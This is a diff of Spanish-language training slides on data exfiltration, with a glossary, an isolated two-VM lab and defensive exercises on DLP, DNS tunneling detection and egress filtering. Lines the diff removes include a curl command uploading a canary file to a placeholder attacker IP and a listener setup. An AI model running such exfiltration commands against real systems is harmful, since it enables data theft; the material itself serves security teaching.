+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Conjunto de tecnologías que inspeccionan datos en movimiento/reposo/uso para bloquear la salida de información sensible según políticas (patrones de tarjetas, PII, clasificación).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  DNS tunneling</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4360,7 +4766,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4398,97 +4804,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Preparar el destino (tu VM atacante). Levanta un receptor HTTP simple:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  python3 -m http.server 8000    # escucha en tu VM de laboratorio</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Observar el canal. En la VM víctima, arranca la captura para ver exactamente qué viaja:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  sudo tcpdump -i eth0 -w /tmp/exfil-lab.pcap host &lt;IPatacante&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Transferir el canario (demostración de impacto). Sube el archivo ficticio por HTTP:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  curl -F "f=@/tmp/canario.txt" http://&lt;IPatacante&gt;:8000/upload</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Analizar como defensor. Abre exfil-lab.pcap en Wireshark: identifica el tamaño, el destino, el protocolo y el patrón temporal. Anota qué firma detectaría esto.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Collection — Reunir los datos dentro de la red objetivo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  C2 (command and control) — Canal por el que el atacante controla el acceso</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Exfiltración — Acto de sacar los datos fuera de la red</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  T1041 vs T1048 — Exfiltrar sobre el C2 o por un canal alternativo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Staging — Comprimir, cifrar y trocear antes de exfiltrar</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Canal HTTP(S) — Se mezcla con la navegación; oculta contenido con TLS</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4539,7 +4945,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4577,67 +4983,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Clasifica en MITRE ATT&amp;CK: ¿T1041 (over C2) o T1048 (alternative protocol)? Justifica con un ejemplo de cada uno.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica por qué DNS e ICMP son canales atractivos para un atacante y qué control los neutraliza.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Diseña una regla de detección (pseudo-Sigma) para "consulta DNS con subdominio &gt; 50 caracteres y alta entropía".</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Calcula cuánto tardaría una exfiltración "low and slow" de 1 GB a 1 KB cada 5 min, y por qué esa lentitud evade umbrales de volumen.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Propón una política de egress filtering mínima para un servidor que solo debe hablar con un repositorio interno.</a:t>
+              <a:t>•  Laboratorio aislado (dos VMs: "atacante" y "víctima" bajo tu control, ambas tuyas). Herramientas de estudio: tcpdump/Wireshark para observar el canal, un servidor HTTP propio para el destino, y…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4688,7 +5034,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4726,22 +5072,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Monta el canal HTTP del laboratorio, captura el tráfico, luego aplica egress filtering y demuestra que la transferencia del canario ahora falla.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: entregas (a) el .pcap con la transferencia inicial identificada, (b) la regla de egress aplicada, y (c) una captura/log que evidencia el bloqueo posterior. Todo con el archivo canario ficticio; cero datos reales.</a:t>
+              <a:t>•  Preparar el destino (tu VM atacante). Levanta un receptor HTTP simple:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Observar el canal. En la VM víctima, arranca la captura para ver exactamente qué viaja:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Transferir el canario (demostración de impacto). Sube el archivo ficticio por HTTP:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Analizar como defensor. Abre exfil-lab.pcap en Wireshark: identifica el tamaño, el destino, el protocolo y el patrón temporal. Anota qué firma detectaría esto.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Simular DNS tunneling (solo para verlo en logs). Genera consultas con subdominios largos hacia tu propio resolvedor de laboratorio y observa en Zeek/dns.log la anomalía de longitud/entropía.…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cerrar el canal (la parte que importa). Aplica egress filtering en el firewall del lab para permitir solo lo necesario y repite el paso 3: la transferencia debe fallar.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Redactar el hallazgo. Escribe 1 párrafo de impacto + 3 recomendaciones (egress filtering, DLP, monitoreo de DNS).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
